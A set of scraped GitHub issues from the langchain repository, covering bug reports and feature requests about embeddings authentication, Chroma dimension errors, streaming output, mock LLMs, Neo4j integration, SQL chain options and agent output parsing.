### System Info Google Colab ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ```python from langchain.embeddings.openai import OpenAIEmbeddings embeder = OpenAIEmbeddings(openai_api_key="redacted_api_key") query_result = embeder.embed_query("show us the embeddings") ``` causes the following error ``` AuthenticationError Traceback (most recent call last) [<ipython-input-30-45e396cd020f>](https://localhost:8080/#) in <cell line: 7>() 5 6 embeddings = OpenAIEmbeddings(openai_api_key="key") ----> 7 docsearch = Chroma.from_documents(texts,embeddings) 17 frames [/usr/local/lib/python3.10/dist-packages/openai/api_requestor.py](https://localhost:8080/#) in _interpret_response_line(self, rbody, rcode, rheaders, stream) 685 stream_error = stream and "error" in resp.data 686 if stream_error or not 200 <= rcode < 300: --> 687 raise self.handle_error_response( 688 rbody, rcode, resp.data, rheaders, stream_error=stream_error 689 ) AuthenticationError: <empty message> ``` ### Expected behavior Expected there to be no error message. I also checked that my API key is working
OpenAIEmbeddings has "AuthenticationError"
https://api.github.com/repos/langchain-ai/langchain/issues/4639/comments
1
2023-05-13T23:44:10Z
2023-05-16T20:08:06Z
https://github.com/langchain-ai/langchain/issues/4639
1,708,767,827
4,639
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. What is the best approach to create a rule based chatbot with LangChain? Context: I need to create a chatbot that needs to collect some basic user's info at the beginning (things like name, email, phone) and then continue providing some general responses based on custom information. Thanks in advance. ### Suggestion: _No response_
Rule based chatbot using LangChain
https://api.github.com/repos/langchain-ai/langchain/issues/4634/comments
2
2023-05-13T17:03:41Z
2023-09-10T16:18:10Z
https://github.com/langchain-ai/langchain/issues/4634
1,708,685,295
4,634
[ "langchain-ai", "langchain" ]
### Feature request Per title, request is to add feature for streaming output response, something like this: ```python from langchain.llms.huggingface_text_gen_inference import HuggingFaceTextGenInference from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler llm = HuggingFaceTextGenInference( inference_server_url='http://localhost:8010', max_new_tokens=512, top_k=10, top_p=0.95, typical_p=0.95, temperature=0.01, stop_sequences=['</s>'], repetition_penalty=1.03, stream=True ) print(llm("What is deep learning?", callbacks=[StreamingStdOutCallbackHandler()])) ``` ### Motivation Having streaming response output is useful for chat situations to reduce perceived latency for the user. Current implementation of HuggingFaceTextGenInference class implemented in [PR 4447](https://github.com/hwchase17/langchain/pull/4447) does not support streaming. ### Your contribution Feature added in [PR #4633](https://github.com/hwchase17/langchain/pull/4633)
[feature] Add support for streaming response output to HuggingFaceTextGenInference LLM
https://api.github.com/repos/langchain-ai/langchain/issues/4631/comments
0
2023-05-13T16:16:48Z
2023-05-15T14:59:14Z
https://github.com/langchain-ai/langchain/issues/4631
1,708,671,913
4,631
[ "langchain-ai", "langchain" ]
### Feature request Components containing LLM are hard to be unit-tested, because their output is not deterministic, and they rely on API which could fail. So I propose a method to mock LLM output by simply recording and replaying the responses. ### Motivation It could be helpful in TDD-based workflow, in which we want to do refactoring, without changing the behavior. ### Your contribution I've made an example in my personal project, which dumps output to JSON file. The implementation: ```python class MockOpenAI(OpenAI): from_file: Path = None to_file: Path = None records: List[LLMResult] = [] # it overrides the generate() method ``` https://github.com/ofey404/WalkingShadows/blob/2cd39f6286193845ba3018bb2bcd42a7ff736fe9/src/backend/services/world/internal/llm/llm.py#L18-L21 The usage: ```python MockOpenAI( # to_file=Path(__file__).parent / "test_world.json" from_file=Path(__file__).parent / "test_world.json" ) ``` https://github.com/ofey404/WalkingShadows/blob/2cd39f6286193845ba3018bb2bcd42a7ff736fe9/src/backend/services/world/api/world/test/test_world.py#L13C1-L17 If it's proper, I'd like to contribute it to langchain, and I would refine the interface to make it more generic. Anyone is interested in this? I'd like to find some support from maintainers.
[feature] Mock LLM by record and replay responses
https://api.github.com/repos/langchain-ai/langchain/issues/4629/comments
5
2023-05-13T15:46:06Z
2023-11-14T16:24:55Z
https://github.com/langchain-ai/langchain/issues/4629
1,708,662,472
4,629
[ "langchain-ai", "langchain" ]
### Feature request The official gpt4all python bindings now exist in the `gpt4all` pip package. [Langchain](https://python.langchain.com/en/latest/modules/models/llms/integrations/gpt4all.html) currently relies on the no-longer maintained pygpt4all package. Langchain should use the `gpt4all` python package with source found here: https://github.com/nomic-ai/gpt4all/tree/main/gpt4all-bindings/python ### Motivation The source at https://github.com/nomic-ai/gpt4all/tree/main/gpt4all-bindings/python supports multiple OS's and platforms (other bindings do not). Nomic AI will be officially maintaining these bindings. ### Your contribution I will be happy to review a pull request and ensure that future changes are PR'd upstream to langchains :)
GPT4All Python Bindings out of date [move to new multiplatform bindings]
https://api.github.com/repos/langchain-ai/langchain/issues/4628/comments
2
2023-05-13T15:15:06Z
2023-09-10T16:18:15Z
https://github.com/langchain-ai/langchain/issues/4628
1,708,650,720
4,628
[ "langchain-ai", "langchain" ]
### System Info v.0.0.167 MacOS 13.3.1 (a) (22E772610a) ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from langchain.embeddings.openai import OpenAIEmbeddings from langchain.vectorstores import Chroma from langchain.llms import AzureOpenAI from langchain.chains import RetrievalQAWithSourcesChain from flask import Flask, request, jsonify, render_template embeddings = OpenAIEmbeddings(model="text-search-davinci-query-001",chunk_size=1) persist_directory = "db" db = Chroma(persist_directory=persist_directory, embedding_function=embeddings) retriever = db.as_retriever() llm = AzureOpenAI(deployment_name="foo") chain = RetrievalQAWithSourcesChain.from_chain_type(llm=llm, chain_type="stuff", retriever=retriever) while True: question = input(f"Ask a question: ") answer = chain({"question": question}, return_only_outputs=True) print(answer) ``` ### Expected behavior In 0.0.123 the above snippet works. In 0.0.167, I get the following: ``` swlib.py", line 119, in _check_dimensionality raise InvalidDimensionException( chromadb.errors.InvalidDimensionException: Dimensionality of (1536) does not match index dimensionality (12288) ```
`chromadb.errors.InvalidDimensionException` introduced somewhere between v0.0.123 and 0.0.167
https://api.github.com/repos/langchain-ai/langchain/issues/4627/comments
3
2023-05-13T14:58:47Z
2023-10-16T16:08:04Z
https://github.com/langchain-ai/langchain/issues/4627
1,708,641,207
4,627
[ "langchain-ai", "langchain" ]
### Feature request There is a need for graph databases to be integrated in langchain. NetworkX isn't suitable for scalable graph databases that would be desired to be queried, particularly with tens of thousands or more nodes and edges. This is necessary for graph databases to compete with vector databases on the level for information extraction within langchain. There is already a [medium article](https://towardsdatascience.com/integrating-neo4j-into-the-langchain-ecosystem-df0e988344d2) and [GitHub repo](https://github.com/tomasonjo/langchain2neo4j) talking about one way in which this is implemented, but it would be ideal if something like this was integrated into langchain itself. This implementation also has Neo4j as embeddings as an option, which should be implemented as well. ### Motivation The [Graph Index Creator](https://python.langchain.com/en/latest/modules/chains/index_examples/graph_qa.html?highlight=GraphIndexCreator) and other small forms of graphs within LangChain use NetworkX which isn't scalable for production for full blown knowledge graphs on the size of the vector databases. I know that I have a particular need to use a graph database in production along with langchain due to a work level project. ### Your contribution Yes, I am willing to contribute. I haven't contributed to LangChain directly before but I am familiar with the source code investigating it. Would love to collaborate on what kind of framework/interface we would need to expand graph indexes with a similar scope as vector database indexes.
Integrate Neo4j as a Graph Index, Vector Index, and as tools in the ecosystem
https://api.github.com/repos/langchain-ai/langchain/issues/4625/comments
10
2023-05-13T13:47:57Z
2023-06-12T14:29:19Z
https://github.com/langchain-ai/langchain/issues/4625
1,708,610,568
4,625
[ "langchain-ai", "langchain" ]
### System Info --------------------------------------------------------------------------- ValidationError Traceback (most recent call last) [<ipython-input-54-a735363693fb>](https://localhost:8080/#) in <cell line: 2>() 1 # sql chain ----> 2 db_chain = SQLDatabaseChain.from_llm(llm, db, 3 return_intermediate_steps=False, # returns query and steps 4 verbose=True, use_query_checker=True, # self-correcting small mistakes 5 top_k=3 # limit the number of rows returned 1 frames /usr/local/lib/python3.10/dist-packages/pydantic/main.cpython-310-x86_64-linux-gnu.so in pydantic.main.BaseModel.__init__() ValidationError: 1 validation error for SQLDatabaseChain use_query_checker extra fields not permitted (type=value_error.extra) ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction from __future__ import annotations import warnings from typing import Any, Dict, List, Optional from pydantic import Extra, Field, root_validator from langchain.base_language import BaseLanguageModel from langchain.callbacks.manager import CallbackManagerForChainRun from langchain.chains.base import Chain from langchain.chains.llm import LLMChain from langchain.chains.sql_database.prompt import DECIDER_PROMPT, PROMPT, SQL_PROMPTS from langchain.prompts.base import BasePromptTemplate from langchain.prompts.prompt import PromptTemplate from langchain.sql_database import SQLDatabase from langchain.tools.sql_database.prompt import QUERY_CHECKER # initialize database llm = OpenAI(temperature=0) db = SQLDatabase.from_uri("sqlite:////content/drive/My Drive/09PHD/sql-murder-mystery.db", sample_rows_in_table_info=1, # examples of rows from each table, consumes tokens # custom_table_info=custom_table_info # we can define custom table info which will override the default sample_rows_in_table_info parameter ) # sql chain db_chain = SQLDatabaseChain.from_llm(llm, db, return_intermediate_steps=False, # returns query and steps verbose=True, # use_query_checker=True, # self-correcting small mistakes NOT WORKING top_k=3 # limit the number of rows returned ) ### Expected behavior The use_query_checker=True parameter in SQLDatabaseChain spits out an error.
use_query_checker in SQLDatabaseChain not working
https://api.github.com/repos/langchain-ai/langchain/issues/4624/comments
4
2023-05-13T12:52:25Z
2023-09-19T16:11:02Z
https://github.com/langchain-ai/langchain/issues/4624
1,708,593,108
4,624
[ "langchain-ai", "langchain" ]
### System Info I was trying out the langchain arxiv chain and I got the cannot parse LLM error. Here is some additional info that might help. ` > Entering new AgentExecutor chain... I need to search for papers related to AI in the oil and gas industry. Action: Arxiv Action Input: "AI in oil and gas industry" Observation: Published: 2023-04-27 Title: Industrial Engineering with Large Language Models: A case study of ChatGPT's performance on Oil & Gas problems Authors: Oluwatosin Ogundare, Srinath Madasu, Nathanial Wiggins Summary: Large Language Models (LLMs) have shown great potential in solving complex problems in various fields, including oil and gas engineering and other industrial engineering disciplines like factory automation, PLC programming etc. However, automatic identification of strong and weak solutions to fundamental physics equations governing several industrial processes remain a challenging task. This paper identifies the limitation of current LLM approaches, particularly ChatGPT in selected practical problems native to oil and gas engineering but not exclusively. The performance of ChatGPT in solving complex problems in oil and gas engineering is discussed and the areas where LLMs are most effective are presented. Published: 2022-02-23 Title: Cybersecurity Challenges in the Offshore Oil and Gas Industry: An Industrial Cyber-Physical Systems (ICPS) Perspective Authors: Abubakar Sadiq Mohammed, Philipp Reinecke, Pete Burnap, Omer Rana, Eirini Anthi Summary: The offshore oil and gas industry has recently been going through a digitalisation drive, with use of `smart' equipment using technologies like the Industrial Internet of Things (IIoT) and Industrial Cyber-Physical Systems (ICPS). There has also been a corresponding increase in cyber attacks targeted at oil and gas companies. Oil production offshore is usually in remote locations, requiring remote access and control. This is achieved by integrating ICPS, Supervisory, Control and Data Acquisition (SCADA) systems, and IIoT technologies. A successful cyber attack against an oil and gas offshore asset could have a devastating impact on the environment, marine ecosystem and safety of personnel. Any disruption to the world's supply of oil and gas (O\&G) can also have an effect on oil prices and in turn, the global economy. This makes it important to secure the industry against cyber threats. We describe the potential cyberattack surface within the oil and gas industry, discussing emerging trends in the offshore sub-sector, and provide a timeline of known cyberattacks. We also present a case study of a subsea control system architecture typically used in offshore oil and gas operations and highlight potential vulnerabilities affecting the components of the system. This study is the first to provide a detailed analysis on the attack vectors in a subsea control system and is crucial to understanding key vulnerabilities, primarily to implement efficient mitigation methods that safeguard the safety of personnel and the environment when using such systems. Published: 2017-05-11 Title: Cloud-based Fault Detection and Classification for Oil & Gas Industry Authors: Athar Khodabakhsh, Ismail Ari, Mustafa Bakir Summary: Oil & Gas industry relies on automated, mission-critical equipment and complex systems built upon their interaction and cooperation. To assure continuous operation and avoid any supervision, architects embed Distributed Control Systems (DCS), a.k.a. Supervisory Control and Data Acquisition (SCADA) systems, on top of their equipment to generate data, monitor state and make critical online & offline decisions. In this paper, we propose a new Lambda architecture for oil & gas industry for unified data and analytical processing on data received from DCS, discuss cloud integration issues and share our experiences with the implementation of sensor fault-detection and classification modules inside the proposed architecture. Thought:I have found three papers related to AI in the oil and gas industry, but I need to narrow down my search to find the best ones. Action: Arxiv Action Input: "Best papers on AI in oil and gas industry" Observation: Published: 2023-04-27 Title: Industrial Engineering with Large Language Models: A case study of ChatGPT's performance on Oil & Gas problems Authors: Oluwatosin Ogundare, Srinath Madasu, Nathanial Wiggins Summary: Large Language Models (LLMs) have shown great potential in solving complex problems in various fields, including oil and gas engineering and other industrial engineering disciplines like factory automation, PLC programming etc. However, automatic identification of strong and weak solutions to fundamental physics equations governing several industrial processes remain a challenging task. This paper identifies the limitation of current LLM approaches, particularly ChatGPT in selected practical problems native to oil and gas engineering but not exclusively. The performance of ChatGPT in solving complex problems in oil and gas engineering is discussed and the areas where LLMs are most effective are presented. Published: 2017-05-11 Title: Cloud-based Fault Detection and Classification for Oil & Gas Industry Authors: Athar Khodabakhsh, Ismail Ari, Mustafa Bakir Summary: Oil & Gas industry relies on automated, mission-critical equipment and complex systems built upon their interaction and cooperation. To assure continuous operation and avoid any supervision, architects embed Distributed Control Systems (DCS), a.k.a. Supervisory Control and Data Acquisition (SCADA) systems, on top of their equipment to generate data, monitor state and make critical online & offline decisions. In this paper, we propose a new Lambda architecture for oil & gas industry for unified data and analytical processing on data received from DCS, discuss cloud integration issues and share our experiences with the implementation of sensor fault-detection and classification modules inside the proposed architecture. Published: 2019-02-26 Title: Intelligent Internet of Things (IoT) Node Demonstrator for Device Monitoring and Control in the Oil and Gas Sector Authors: Stephen Ugwuanyi, James Irvine Summary: Internet of Things (IoT) is the new industrial slogan for connecting intelligent and unintelligent devices to the web. The problem of security of data transfer, interoperability of different proposed methodologies, the ubiquity of Wi-Fi and the development of low power consuming MCUs has broadened the search for the best alternative technology for IoT in the oil and gas sector. This paper focus on the communication method for IoT devices to determine the level of functionality and the efficiency of interfacing the new MOD-WIFI-ESP8266-DEV Wi-Fi unit based on the IEEE 802.11 standard with MSP430 by Texas Instrument. The system controls LEDs and monitors Temperature/Humidity sensor (DHT11) using Android application and web service. The system presents in three-layered structure an ecosystem of lightweight, small size, reduced cost and low power IoT system. It is expected that industries/users of this system would be able to control, monitor, and analyse data generated by the web of connected devices. Thought: --------------------------------------------------------------------------- OutputParserException Traceback (most recent call last) [<ipython-input-4-ef16113c8f19>](https://localhost:8080/#) in <cell line: 1>() ----> 1 agent_chain.run( 2 "What are some of the best papers on AI in oil an gas industry??", 3 ) 7 frames [/usr/local/lib/python3.10/dist-packages/langchain/agents/mrkl/output_parser.py](https://localhost:8080/#) in parse(self, text) 24 match = re.search(regex, text, re.DOTALL) 25 if not match: ---> 26 raise OutputParserException(f"Could not parse LLM output: `{text}`") 27 action = match.group(1).strip() 28 action_input = match.group(2) OutputParserException: Could not parse LLM output: `Based on the summaries, the best papers on AI in the oil and gas industry are "Industrial Engineering with Large Language Models: A case study of ChatGPT's performance on Oil & Gas problems" and "Cloud-based Fault Detection and Classification for Oil & Gas Industry".` ` ### Who can help? @hwchase17 , @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Input : agent_chain.run( "What are some of the best papers on AI in oil an gas industry??", ) ### Expected behavior A proper answer as provided by an LLM.
Arxiv chain : cannot parse output
https://api.github.com/repos/langchain-ai/langchain/issues/4622/comments
1
2023-05-13T11:43:21Z
2023-09-10T16:18:20Z
https://github.com/langchain-ai/langchain/issues/4622
1,708,571,207
4,622
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi. I have used an integration of langchain with Pinecone, as well as ChromaDB. My question is whether you recommend any alternative vector database that is free? ### Suggestion: _No response_
Issue: Free Vector Database?
https://api.github.com/repos/langchain-ai/langchain/issues/4621/comments
4
2023-05-13T10:03:49Z
2023-09-19T16:11:06Z
https://github.com/langchain-ai/langchain/issues/4621
1,708,544,666
4,621